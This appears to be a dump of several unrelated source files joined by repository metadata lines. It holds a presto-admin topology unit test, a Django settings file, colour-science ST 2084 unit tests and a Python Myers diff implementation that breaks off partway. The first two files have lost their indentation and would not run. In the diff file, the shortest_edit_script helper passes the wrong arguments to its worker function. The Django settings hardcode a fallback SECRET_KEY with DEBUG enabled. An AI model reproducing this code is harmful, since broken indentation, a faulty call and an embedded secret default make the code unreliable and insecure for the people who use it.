# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests the presto topology config
"""
import unittest
from mock import patch
from fabric.state import env
from prestoadmin import topology
from prestoadmin.standalone import config
from prestoadmin.standalone.config import StandaloneConfig
from prestoadmin.util.exception import ConfigurationError
from tests.unit.base_unit_case import BaseUnitCase
class TestTopologyConfig(BaseUnitCase):
def setUp(self):
super(TestTopologyConfig, self).setUp(capture_output=True)
@patch('tests.unit.test_topology.StandaloneConfig._get_conf_from_file')
def test_fill_conf(self, get_conf_from_file_mock):
get_conf_from_file_mock.return_value = \
{"username": "john", "port": "100"}
config = StandaloneConfig()
conf = config.read_conf()
self.assertEqual(conf, {"username": "john", "port": 100,
"coordinator": "localhost",
"workers": ["localhost"]})
def test_invalid_property(self):
conf = {"username": "me",
"port": "1234",
"coordinator": "coordinator",
"workers": ["node1", "node2"],
"invalid property": "fake"}
self.assertRaisesRegexp(ConfigurationError,
"Invalid property: invalid property",
config.validate, conf)
def test_basic_valid_conf(self):
conf = {"username": "user",
"port": 1234,
"coordinator": "my.coordinator",
"workers": ["my.worker1", "my.worker2", "my.worker3"]}
self.assertEqual(config.validate(conf.copy()), conf)
def test_valid_string_port_to_int(self):
conf = {'username': 'john',
'port': '123',
'coordinator': 'master',
'workers': ['worker1', 'worker2']}
validated_conf = config.validate(conf.copy())
self.assertEqual(validated_conf['port'], 123)
def test_empty_host(self):
self.assertRaisesRegexp(ConfigurationError,
"'' is not a valid ip address or host name",
config.validate_coordinator, (""))
def test_valid_workers(self):
workers = ["172.16.1.10", "myslave", "FE80::0202:B3FF:FE1E:8329"]
self.assertEqual(config.validate_workers(workers), workers)
def test_no_workers(self):
self.assertRaisesRegexp(ConfigurationError,
"Must specify at least one worker",
config.validate_workers, ([]))
def test_invalid_workers_type(self):
self.assertRaisesRegexp(ConfigurationError,
"Workers must be of type list. "
"Found <type 'str'>",
config.validate_workers, ("not a list"))
def test_invalid_coordinator_type(self):
self.assertRaisesRegexp(ConfigurationError,
"Host must be of type string. "
"Found <type 'list'>",
config.validate_coordinator,
(["my", "list"]))
def test_validate_workers_for_prompt(self):
workers_input = "172.16.1.10 myslave FE80::0202:B3FF:FE1E:8329"
workers_list = ["172.16.1.10", "myslave", "FE80::0202:B3FF:FE1E:8329"]
self.assertEqual(config.validate_workers_for_prompt(workers_input),
workers_list)
def test_show(self):
env.roledefs = {'coordinator': ['hello'], 'worker': ['a', 'b'],
'all': ['a', 'b', 'hello']}
env.user = 'user'
env.port = '22'
self.remove_runs_once_flag(topology.show)
topology.show()
self.assertEqual("", self.test_stderr.getvalue())
self.assertEqual("{'coordinator': 'hello',\n 'port': '22',\n "
"'username': 'user',\n 'workers': ['a',\n"
" 'b']}\n",
self.test_stdout.getvalue())
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -4,119,446,143,831,137,300 | 38.391667 | 78 | 0.562513 | false |
bcoding/django-docker-hostmanager | docker_hostmanager/settings.py | 1 | 2000 | import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = os.environ.get('SECRET_KEY', 'sj0q9n1_h=b8my#6-n^r=l5=hgekx4gwrl1nmaoox^-_%6=%qj')
DEBUG = True
if not DEBUG and not 'SECRET_KEY' in os.environ:
raise Exception('production environments must have it\'s own SECRET_KEY')
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'docker_hostmanager.api',
'docker_hostmanager.rest',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'docker_hostmanager.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'docker_hostmanager.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'hostmanager.sqlite3'),
}
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = '.'
| unlicense | 7,148,998,048,566,972,000 | 25.315789 | 95 | 0.6675 | false |
colour-science/colour | colour/models/rgb/transfer_functions/tests/test_st_2084.py | 1 | 5051 | # -*- coding: utf-8 -*-
"""
Defines the unit tests for the
:mod:`colour.models.rgb.transfer_functions.st_2084` module.
"""
import numpy as np
import unittest
from colour.models.rgb.transfer_functions import (eotf_inverse_ST2084,
eotf_ST2084)
from colour.utilities import domain_range_scale, ignore_numpy_errors
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = ['TestEotf_inverse_ST2084', 'TestEotf_ST2084']
class TestEotf_inverse_ST2084(unittest.TestCase):
"""
Defines :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition unit tests methods.
"""
def test_eotf_inverse_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition.
"""
self.assertAlmostEqual(
eotf_inverse_ST2084(0.0), 0.000000730955903, places=7)
self.assertAlmostEqual(
eotf_inverse_ST2084(100), 0.508078421517399, places=7)
self.assertAlmostEqual(
eotf_inverse_ST2084(400), 0.652578597563067, places=7)
self.assertAlmostEqual(eotf_inverse_ST2084(5000, 5000), 1.0, places=7)
def test_n_dimensional_eotf_inverse_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition n-dimensional arrays support.
"""
C = 100
N = eotf_inverse_ST2084(C)
C = np.tile(C, 6)
N = np.tile(N, 6)
np.testing.assert_almost_equal(eotf_inverse_ST2084(C), N, decimal=7)
C = np.reshape(C, (2, 3))
N = np.reshape(N, (2, 3))
np.testing.assert_almost_equal(eotf_inverse_ST2084(C), N, decimal=7)
C = np.reshape(C, (2, 3, 1))
N = np.reshape(N, (2, 3, 1))
np.testing.assert_almost_equal(eotf_inverse_ST2084(C), N, decimal=7)
def test_domain_range_scale_eotf_inverse_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition domain and range scale support.
"""
C = 100
N = eotf_inverse_ST2084(C)
d_r = (('reference', 1), (1, 1), (100, 100))
for scale, factor in d_r:
with domain_range_scale(scale):
np.testing.assert_almost_equal(
eotf_inverse_ST2084(C * factor), N * factor, decimal=7)
@ignore_numpy_errors
def test_nan_eotf_inverse_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition nan support.
"""
eotf_inverse_ST2084(
np.array([-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]))
class TestEotf_ST2084(unittest.TestCase):
"""
Defines :func:`colour.models.rgb.transfer_functions.st_2084.eotf_ST2084`
definition unit tests methods.
"""
def test_eotf_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_ST2084` definition.
"""
self.assertAlmostEqual(eotf_ST2084(0.0), 0.0, places=7)
self.assertAlmostEqual(eotf_ST2084(0.508078421517399), 100, places=7)
self.assertAlmostEqual(eotf_ST2084(0.652578597563067), 400, places=7)
self.assertAlmostEqual(eotf_ST2084(1.0, 5000), 5000.0, places=7)
def test_n_dimensional_eotf_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_ST2084` definition n-dimensional arrays support.
"""
N = 0.508078421517399
C = eotf_ST2084(N)
N = np.tile(N, 6)
C = np.tile(C, 6)
np.testing.assert_almost_equal(eotf_ST2084(N), C, decimal=7)
N = np.reshape(N, (2, 3))
C = np.reshape(C, (2, 3))
np.testing.assert_almost_equal(eotf_ST2084(N), C, decimal=7)
N = np.reshape(N, (2, 3, 1))
C = np.reshape(C, (2, 3, 1))
np.testing.assert_almost_equal(eotf_ST2084(N), C, decimal=7)
def test_domain_range_scale_eotf_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_ST2084` definition domain and range scale support.
"""
N = 0.508078421517399
C = eotf_ST2084(N)
d_r = (('reference', 1), (1, 1), (100, 100))
for scale, factor in d_r:
with domain_range_scale(scale):
np.testing.assert_almost_equal(
eotf_ST2084(N * factor), C * factor, decimal=7)
@ignore_numpy_errors
def test_nan_eotf_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_ST2084` definition nan support.
"""
eotf_ST2084(np.array([-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 8,866,690,478,021,569,000 | 30.372671 | 78 | 0.605425 | false |
RobertElderSoftware/roberteldersoftwarediff | myers_diff_and_variations.py | 1 | 43442 | # Copyright 2017 Robert Elder Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import string
import sys
import os
"""
This file contains Python implementations for variations of algorithms described in
'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS. A few optimizations
not mentioned in the paper are also included here.
* FUNCTIONS INCLUDED IN THIS FILE *
- diff(list1, list2) - A function to determine the minimal difference between two sequences that
is super easy to just copy and paste when you don't actually care about all the other stuff
in this document, and you just need to get back to work because it's already 7pm and you're still
at the office, and you just want to get this stupid thing to work, why is there no easy answer on
Stack Overflow that I can just copy and paste? Oh man, I really need to stop doing this and
start saying no to these crazy deadlines. I have so many friends that I need to get back to and haven't
spoken to in a while... Maybe I'll just stay until most of my stock options vest, and then I'll
quit. This function has worst-case execution time of O(min(len(a),len(b)) * D), and requires
2 * (2 * min(len(a),len(b))) space.
- apply_edit_script(edit_script, s1, s2) - An example function that shows how you could make use of
the edit script returned by 'diff' or 'shortest_edit_script' by re-constructing s2 from s1 and the
edit script.
- shortest_edit_script(old_sequence, new_sequence) - A well-formatted version of the diff function
(mentioned above) that optimizes for code clarity and readability. This version also calls out
to the find_middle_snake function which it depends on. This version of the algorithm is also
presented in a way that attempts to match the description from the paper.
- longest_common_subsequence(list1, list2) - A function that returns a list that is the longest
common sub-sequence of the two input sequences.
- find_middle_snake_less_memory(old_sequence, N, new_sequence, M) - A variant of the 'find middle
snake' algorithm that has more restriced bounds so the calculation doesn't go off end end of the
edit grid. It has worst-case execution time of min(len(a),len(b)) * D, and requires
2 * (2 * min(len(a),len(b))) space.
- find_middle_snake_myers_original(old_sequence, N, new_sequence, M) - A concrete implementation of
the algorithm discussed in Myers' paper. This algorithm has worst-case execution time of (M + N) * D
and requires 2 * (M + N) space.
- myers_diff_length_minab_memory(old_sequence, new_sequence) - A version of the basic length measuring
algorithm that makes use of the restriced bounds, and also allocates less memory by treating the V
array as a circular buffer.
- myers_diff_length_original_page_6(old_sequence, new_sequence) - A concrete implementation of the algorithm
discussed on page 6 of Myers' paper.
- myers_diff_length_optimize_y_variant(old_sequence, new_sequence) - A variant of the basic length measuring
algorithm that optimized for the y variable instead of x. It is helpful to study this version when
attempting to understand the algorithm since the choice of optimizing x or y is rather arbitrary.
- Various other functions are included for testing.
"""
# Returns a minimal list of differences between 2 lists e and f
# requring O(min(len(e),len(f))) space and O(min(len(e),len(f)) * D)
# worst-case execution time where D is the number of differences.
def diff(e, f, i=0, j=0):
# Documented at http://blog.robertelder.org/diff-algorithm/
N,M,L,Z = len(e),len(f),len(e)+len(f),2*min(len(e),len(f))+2
if N > 0 and M > 0:
w,g,p = N-M,[0]*Z,[0]*Z
for h in range(0, (L//2+(L%2!=0))+1):
for r in range(0, 2):
c,d,o,m = (g,p,1,1) if r==0 else (p,g,0,-1)
for k in range(-(h-2*max(0,h-M)), h-2*max(0,h-N)+1, 2):
a = c[(k+1)%Z] if (k==-h or k!=h and c[(k-1)%Z]<c[(k+1)%Z]) else c[(k-1)%Z]+1
b = a-k
s,t = a,b
while a<N and b<M and e[(1-o)*N+m*a+(o-1)]==f[(1-o)*M+m*b+(o-1)]:
a,b = a+1,b+1
c[k%Z],z=a,-(k-w)
if L%2==o and z>=-(h-o) and z<=h-o and c[k%Z]+d[z%Z] >= N:
D,x,y,u,v = (2*h-1,s,t,a,b) if o==1 else (2*h,N-a,M-b,N-s,M-t)
if D > 1 or (x != u and y != v):
return diff(e[0:x],f[0:y],i,j)+diff(e[u:N],f[v:M],i+u,j+v)
elif M > N:
return diff([],f[N:M],i+N,j+N)
elif M < N:
return diff(e[M:N],[],i+M,j+M)
else:
return []
elif N > 0: # Modify the return statements below if you want a different edit script format
return [{"operation": "delete", "position_old": i+n} for n in range(0,N)]
else:
return [{"operation": "insert", "position_old": i,"position_new":j+n} for n in range(0,M)]
def find_middle_snake_less_memory(old_sequence, N, new_sequence, M):
"""
A variant of the 'find middle snake' function that uses O(min(len(a), len(b)))
memory instead of O(len(a) + len(b)) memory. This does not improve the
worst-case memory requirement, but it takes the best case memory requirement
down to near zero.
"""
MAX = N + M
Delta = N - M
V_SIZE=2*min(M,N) + 2
Vf = [None] * V_SIZE
Vb = [None] * V_SIZE
Vf[1] = 0
Vb[1] = 0
for D in range(0, (MAX//2+(MAX%2!=0)) + 1):
for k in range(-(D - 2*max(0, D-M)), D - 2*max(0, D-N) + 1, 2):
if k == -D or k != D and Vf[(k - 1) % V_SIZE] < Vf[(k + 1) % V_SIZE]:
x = Vf[(k + 1) % V_SIZE]
else:
x = Vf[(k - 1) % V_SIZE] + 1
y = x - k
x_i = x
y_i = y
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
Vf[k % V_SIZE] = x
inverse_k = (-(k - Delta))
if (Delta % 2 == 1) and inverse_k >= -(D -1) and inverse_k <= (D -1):
if Vf[k % V_SIZE] + Vb[inverse_k % V_SIZE] >= N:
return 2 * D -1, x_i, y_i, x, y
for k in range(-(D - 2*max(0, D-M)), (D - 2*max(0, D-N)) + 1, 2):
if k == -D or k != D and Vb[(k - 1) % V_SIZE] < Vb[(k + 1) % V_SIZE]:
x = Vb[(k + 1) % V_SIZE]
else:
x = Vb[(k - 1) % V_SIZE] + 1
y = x - k
x_i = x
y_i = y
while x < N and y < M and old_sequence[N - x -1] == new_sequence[M - y - 1]:
x = x + 1
y = y + 1
Vb[k % V_SIZE] = x
inverse_k = (-(k - Delta))
if (Delta % 2 == 0) and inverse_k >= -D and inverse_k <= D:
if Vb[k % V_SIZE] + Vf[inverse_k % V_SIZE] >= N:
return 2 * D, N - x, M - y, N - x_i, M - y_i
def find_middle_snake_myers_original(old_sequence, N, new_sequence, M):
"""
This function is a concrete implementation of the algorithm for 'finding the middle snake' presented
similarly to the pseudocode on page 11 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
This algorithm is a centeral part of calculating either the smallest edit script for a pair of
sequences, or finding the longest common sub-sequence (these are known to be dual problems).
The worst-case (and expected case) space requirement of this function is O(N + M), where N is
the length of the first sequence, and M is the length of the second sequence.
The worst-case run time of this function is O(MN) and this occurs when both string have no common
sub-sequence. Since the expected case is for the sequences to have some similarities, the expected
run time is O((M + N)D) where D is the number of edits required to transform sequence A into sequence B.
The space requirement remains the same in all cases, but less space could be used with a modified version
of the algorithm that simply specified a user-defined MAX value less than M + N. In this case, the
algorithm would stop earlier and report a D value no greater than MAX, which would be interpreted as
'there is no edit sequence less than length D that produces the new_sequence from old_sequence'.
Note that (if I have understood the paper correctly), the k values used for the reverse direction
of this implementation have opposite sign compared with those suggested in the paper. I found this made
the algorithm easier to implement as it makes the forward and reverse directions more symmetric.
@old_sequence This represents a sequence of something that can be compared against 'new_sequence'
using the '==' operator. It could be characters, or lines of text or something different.
@N The length of 'old_sequence'
@new_sequence The new sequence to compare 'old_sequence' against.
@M The length of 'new_sequence'
There are 5 return values for this function:
The first is an integer representing the number of edits (delete or insert) that are necessary to
produce new_sequence from old_sequence.
The next two parts of the return value are the point (x, y) representing the starting coordinate of the
middle snake.
The next two return values are the point (u, v) representing the end coordinate of the middle snake.
It is possible that (x,y) == (u,v)
"""
# The sum of the length of the seqeunces.
MAX = N + M
# The difference between the length of the sequences.
Delta = N - M
# The array that holds the 'best possible x values' in search from top left to bottom right.
Vf = [None] * (MAX + 2)
# The array that holds the 'best possible x values' in search from bottom right to top left.
Vb = [None] * (MAX + 2)
# The initial point at (0, -1)
Vf[1] = 0
# The initial point at (N, M+1)
Vb[1] = 0
# We only need to iterate to ceil((max edit length)/2) because we're searching in both directions.
for D in range(0, (MAX//2+(MAX%2!=0)) + 1):
for k in range(-D, D + 1, 2):
if k == -D or k != D and Vf[k - 1] < Vf[k + 1]:
# Did not increase x, but we'll take the better (or only) x value from the k line above
x = Vf[k + 1]
else:
# We can increase x by building on the best path from the k line above
x = Vf[k - 1] + 1
# From fundamental axiom of this algorithm: x - y = k
y = x - k
# Remember the initial point before the snake so we can report it.
x_i = x
y_i = y
# While these sequences are identical, keep moving through the graph with no cost
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
# This is the new best x value
Vf[k] = x
# Only check for connections from the forward search when N - M is odd
# and when there is a reciprocal k line coming from the other direction.
if (Delta % 2 == 1) and (-(k - Delta)) >= -(D -1) and (-(k - Delta)) <= (D -1):
if Vf[k] + Vb[-(k - Delta)] >= N:
return 2 * D -1, x_i, y_i, x, y
for k in range(-D, D + 1, 2):
if k == -D or k != D and Vb[k - 1] < Vb[k + 1]:
x = Vb[k + 1]
else:
x = Vb[k - 1] + 1
y = x - k
x_i = x
y_i = y
while x < N and y < M and old_sequence[N - x -1] == new_sequence[M - y - 1]:
x = x + 1
y = y + 1
Vb[k] = x
if (Delta % 2 == 0) and (-(k - Delta)) >= -D and (-(k - Delta)) <= D:
if Vb[k] + Vf[(-(k - Delta))] >= N:
return 2 * D, N - x, M - y, N - x_i, M - y_i
def longest_common_subsequence_h(old_sequence, N, new_sequence, M):
"""
This function is a concrete implementation of the algorithm for finding the longest common subsequence presented
similarly to the pseudocode on page 12 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
@old_sequence This represents a sequence of something that can be compared against 'new_sequence'
using the '==' operator. It could be characters, or lines of text or something different.
@N The length of 'old_sequence'
@new_sequence The new sequence to compare 'old_sequence' against.
@M The length of 'new_sequence'
The return value is a new sequence that is the longest common subsequence of old_sequence and new_sequence.
"""
rtn = []
if N > 0 and M > 0:
D, x, y, u, v = find_middle_snake_less_memory(old_sequence, N, new_sequence, M)
if D > 1:
# LCS(A[1..x],x,B[1..y],y)
rtn.extend(longest_common_subsequence_h(old_sequence[0:x], x, new_sequence[0:y], y))
# Output A[x+1..u].
rtn.extend(old_sequence[x:u])
# LCS(A[u+1..N],N-u,B[v+1..M],M-v)
rtn.extend(longest_common_subsequence_h(old_sequence[u:N], N-u, new_sequence[(v):M], M-v))
elif M > N:
# Output A[1..N].
rtn.extend(old_sequence[0:N])
else:
# Output B[1..M].
rtn.extend(new_sequence[0:M])
return rtn
def longest_common_subsequence(old_sequence, new_sequence):
# Just a helper function so you don't have to pass in the length of the sequences.
return longest_common_subsequence_h(old_sequence, len(old_sequence), new_sequence, len(new_sequence));
def shortest_edit_script_h(old_sequence, N, new_sequence, M, current_x, current_y):
"""
This function is a concrete implementation of the algorithm for finding the shortest edit script that was
'left as an exercise' on page 12 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
@old_sequence This represents a sequence of something that can be compared against 'new_sequence'
using the '==' operator. It could be characters, or lines of text or something different.
@N The length of 'old_sequence'
@new_sequence The new sequence to compare 'old_sequence' against.
@M The length of 'new_sequence'
The return value is a sequence of objects that contains the indicies in old_sequnce and new_sequnce that
you could use to produce new_sequence from old_sequence using the minimum number of edits.
The format of this function as it is currently written is optimized for clarity, not efficiency. It is
expected that anyone wanting to use this function in a real application would modify the 2 lines noted
below to produce whatever representation of the edit sequence you wanted.
"""
rtn = []
if N > 0 and M > 0:
D, x, y, u, v = find_middle_snake_less_memory(old_sequence, N, new_sequence, M)
# If the graph represented by the current sequences can be further subdivided.
if D > 1 or (x != u and y != v):
# Collection delete/inserts before the snake
rtn.extend(shortest_edit_script_h(old_sequence[0:x], x, new_sequence[0:y], y, current_x, current_y))
# Collection delete/inserts after the snake
rtn.extend(shortest_edit_script_h(old_sequence[u:N], N-u, new_sequence[v:M], M-v, current_x + u, current_y + v))
elif M > N:
# M is longer than N, but we know there is a maximum of one edit to transform old_sequence into new_sequence
# The first N elements of both sequences in this case will represent the snake, and the last element
# will represent a single insertion.
rtn.extend(shortest_edit_script_h(old_sequence[N:N], N-N, new_sequence[N:M], M-N, current_x + N, current_y + N))
elif M < N:
# N is longer than (or equal to) M, but we know there is a maximum of one edit to transform old_sequence into new_sequence
# The first M elements of both sequences in this case will represent the snake, and the last element
# will represent a single deletion. If M == N, then this reduces to a snake which does not contain any edits.
rtn.extend(shortest_edit_script_h(old_sequence[M:N], N-M, new_sequence[M:M], M-M, current_x + M, current_y + M))
elif N > 0:
# This area of the graph consist of only horizontal edges that represent deletions.
for i in range(0, N):
# Modify this line if you want a more efficient representation:
rtn.append({"operation": "delete", "position_old": current_x + i})
else:
# This area of the graph consist of only vertical edges that represent insertions.
for i in range(0, M):
# Modify this line if you want a more efficient representation:
rtn.append({"operation": "insert", "position_old": current_x, "position_new": current_y + i})
return rtn
def shortest_edit_script(old_sequence, new_sequence):
# Just a helper function so you don't have to pass in the length of the sequences.
return shortest_edit_script_h(old_sequence, new_sequence, 0, 0);
def get_random_edit_script(old_sequence, new_sequence):
"""
Used for testing. The Myers algorithms should never produce an edit script
that is longer than the random version.
"""
es = []
N = len(old_sequence)
M = len(new_sequence)
x = 0
y = 0
D = 0
while not (x == N and y == M):
while (x < N) and (y < M) and (old_sequence[x] == new_sequence[y]):
x = x + 1
y = y + 1
if (x < N) and (y < M):
if random.randint(0, 1):
es.append({"operation": "delete", "position_old": x})
x = x + 1
else:
es.append({"operation": "insert", "position_old": x, "position_new": y})
y = y + 1
D = D + 1
elif x < N:
es.append({"operation": "delete", "position_old": x})
x = x + 1
D = D + 1
elif y < M:
es.append({"operation": "insert", "position_old": x, "position_new": y})
y = y + 1
D = D + 1
return es
def myers_diff_length_minab_memory(old_sequence, new_sequence):
"""
A variant that uses min(len(a),len(b)) memory
"""
N = len(old_sequence)
M = len(new_sequence)
MAX = N + M
V_SIZE = 2*min(N,M) + 2
V = [None] * V_SIZE
V[1] = 0
for D in range(0, MAX + 1):
for k in range(-(D - 2*max(0, D-M)), D - 2*max(0, D-N) + 1, 2):
if k == -D or k != D and V[(k - 1) % V_SIZE] < V[(k + 1) % V_SIZE]:
x = V[(k + 1) % V_SIZE]
else:
x = V[(k - 1) % V_SIZE] + 1
y = x - k
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
V[k % V_SIZE] = x
if x == N and y == M:
return D
def myers_diff_length_half_memory(old_sequence, new_sequence):
"""
This function is a modified implementation of the algorithm for finding the length of the shortest edit
script on page 6 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
This version uses 50% of the memory of the one described of page 6 of the paper, and has 50% of the
worst-case execution time.
The optimization comes from improving the calculation of the iteration bounds and replacing the line:
for k in range(-D, D + 1, 2):
from the original with
for k in range(-(D - 2*max(0, D-M)), D - 2*max(0, D-N) + 1, 2):
This optimization works by maintaining tighter bounds on k by measuring how far off the edit grid
the current value of D would take us if we to look at points on the line k = D. The overshoot
distance is equal to D-N on the right edge of the edit grid, and D-M on the bottom edge of the edit
grid.
"""
N = len(old_sequence)
M = len(new_sequence)
MAX = N + M
V = [None] * (MAX + 2)
V[1] = 0
for D in range(0, MAX + 1):
for k in range(-(D - 2*max(0, D-M)), D - 2*max(0, D-N) + 1, 2):
if k == -D or k != D and V[k - 1] < V[k + 1]:
x = V[k + 1]
else:
x = V[k - 1] + 1
y = x - k
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
V[k] = x
if x == N and y == M:
return D
def myers_diff_length_original_page_6(old_sequence, new_sequence):
"""
This function is a concrete implementation of the algorithm for finding the length of the shortest edit
script on page 6 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
@old_sequence This represents a sequence of something that can be compared against 'new_sequence'
using the '==' operator. It could be characters, or lines of text or something different.
@new_sequence The new sequence to compare 'old_sequence' against.
The return value is an integer describing the minimum number of edits required to produce new_sequence
from old_sequence. If no edits are required the return value is 0. Since this function only returns
the length of the shortest edit sequence, you must use another function (included here) to recover
the edit sequence. You can also modify this version to do it, but this requires O((M+N)^2) memory.
The format of this function as it is currently written is optimized for clarity and to match
the version found in the referenced paper. There are a few optimizations that can be done to
decrease the memory requirements, and those have been done in another function here.
"""
N = len(old_sequence)
M = len(new_sequence)
MAX = N + M
# The +2 ensures we don't get an access violation when N + M = 0, since we need to
# consider at least 2 points for a comparison of empty sequences.
# The 2*MAX can be reduced to just MAX using more intelligent bounds calculation
# instead of just iterating from -D to D.
V = [None] * (2 * MAX + 2)
V[1] = 0
for D in range(0, MAX + 1):
# The range -D to D expands as we move diagonally accross the rectangular edit grid.
for k in range(-D, D + 1, 2):
# If k is against the left wall, or (not aginst the top wall and there is a
# k line that has reached a higher x value above the current k line)
if k == -D or k != D and V[k - 1] < V[k + 1]:
# Extend the path from the k line above to add an insertion to the path.
# V[] measures the best x values, so we don't need to increment x here.
x = V[k + 1]
else:
# Otherwise, V[k - 1] >= V[k + 1], or K == D which means that we
# use the k line from below to extend the best path, and since this
# path is a horizontal one (a deletion), we increment x.
x = V[k - 1] + 1
# From the axiom of the algorithm: x - y = k
y = x - k
# Move through the diagonal that has 0 edit cost (strings are same here)
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
# Store our new best x value
V[k] = x
# Have we completely moved through the grid?
if x >= N and y >= M:
return D
def myers_diff_length_optimize_y_variant(old_sequence, new_sequence):
"""
This function is a variant of the algorithm for finding the length of the shortest edit
script on page 6 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
This version optimizes the variable y instead of x.
"""
N = len(old_sequence)
M = len(new_sequence)
MAX = N + M
V = [None] * (2 * MAX + 2)
V[-1] = 0
for D in range(0, MAX + 1):
for k in range(-D, D + 1, 2):
if k == D or k != -D and V[k - 1] > V[k + 1]:
y = V[k - 1]
else:
y = V[k + 1] + 1
x = y + k
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
V[k] = y
if x >= N and y >= M:
return D
def generate_alphabet():
"""
This function is used for testing.
"""
alphabet_size = random.randint(1, len(string.ascii_letters))
return [random.choice(string.ascii_letters) for i in range(0, alphabet_size)]
class EditGraph(object):
"""
When testing the myers diff algorithm and its variants, it is meaningful to test by
first constructing an edit graph, and solving for a sequence that would match
that edit graph as closely as possible.
Randomly generating statistically independent sequences won't cover as many cases of
program execution as 'real' sequences that have some intrinsic relationship between
them.
In this class, an 'edit graph' is constructed with random dimensions and filled with
random diagonals. The 'solve sequences' method then attempts to build two sequences
that would have produced this edit graph as closely as possible.
Note that it is not always possible to produce a pair of sequences that would exactly
produce these randomly generated edit graphs because you can draw an 'impossible'
edit graph where the implied relationship of diagonals would deduce that some squares
that are not diagonals must in fact be diagonals. The code below, simply solves
for the 'equal to' constraints and ignores the 'not equal to' constraint of empty
squares. Therefore, the sequences that get solved for will likely not have exactly
the same edit graph that was created, but at least it will be close and produce
a pair of sequences with an intrinsic relationship between them.
"""
def __init__(self, x, y, diagonal_probability):
self.x = x
self.y = y
self.diagonal_probability = diagonal_probability
self.graph = []
self.make_empty_edit_graph(x, y)
self.add_random_diagonals_to_edit_graph()
def make_empty_edit_graph(self, x, y):
for i in range(0,y):
r = []
for j in range(0,x):
r.append(False)
self.graph.append(r)
def print_edit_graph(self):
for i in range(0, self.y):
r = self.graph[i]
if i == 0:
sys.stdout.write("+")
for j in range(0, len(r)):
sys.stdout.write("-+")
sys.stdout.write("\n")
sys.stdout.write("|")
for j in range(0, len(r)):
if r[j]["is_diagonal"]:
sys.stdout.write("\\|")
else:
sys.stdout.write(" |")
sys.stdout.write("\n")
sys.stdout.write("+")
for j in range(0, len(r)):
sys.stdout.write("-+")
sys.stdout.write("\n")
def solve_edit_graph(self):
# Attempt to assign symbols to the input strings that produced this edit graph.
s1 = []
for i in range(0, self.x):
s1.append({})
s2 = []
for i in range(0, self.y):
s2.append({})
current_symbol = 0
for j in range(0, self.y):
for i in range(0, self.x):
if self.graph[j][i]["is_diagonal"]:
